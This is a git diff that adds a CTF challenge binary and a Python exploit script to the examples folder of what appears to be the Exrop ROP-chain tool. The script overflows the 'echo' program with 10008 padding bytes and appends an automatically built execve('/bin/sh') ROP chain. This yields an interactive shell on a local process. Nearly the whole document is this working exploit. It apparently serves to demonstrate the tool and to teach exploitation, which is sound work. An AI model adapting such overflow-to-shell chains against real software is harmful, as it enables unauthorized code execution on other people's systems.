diff --git a/examples/CJ2017_echo/echo b/examples/CJ2017_echo/echo
new file mode 100755
index 0000000..d3b90cc
Binary files /dev/null and b/examples/CJ2017_echo/echo differ
diff --git a/examples/CJ2017_echo/exploit.py b/examples/CJ2017_echo/exploit.py
new file mode 100644
index 0000000..388a2cf
--- /dev/null
+++ b/examples/CJ2017_echo/exploit.py
@@ -0,0 +1,19 @@
+from pwn import *
+import time
+from Exrop import Exrop
+
+binname = "echo"
+libc = ELF(binname, checksec=False)
+bss = libc.bss()
+
+t = time.mktime(time.gmtime())
+rop = Exrop(binname)
+rop.find_gadgets(cache=True) # it's slow for first analyze keep waiting
+print("Analyzing done in {}s".format(time.mktime(time.gmtime()) - t))
+chain = rop.syscall(0x3b, ("/bin/sh",0,0), bss)
+chain.dump()
+buf = b"A"*10008
+pay = buf + chain.payload_str()
+p = process("./echo")
+p.sendline(pay)
+p.interactive()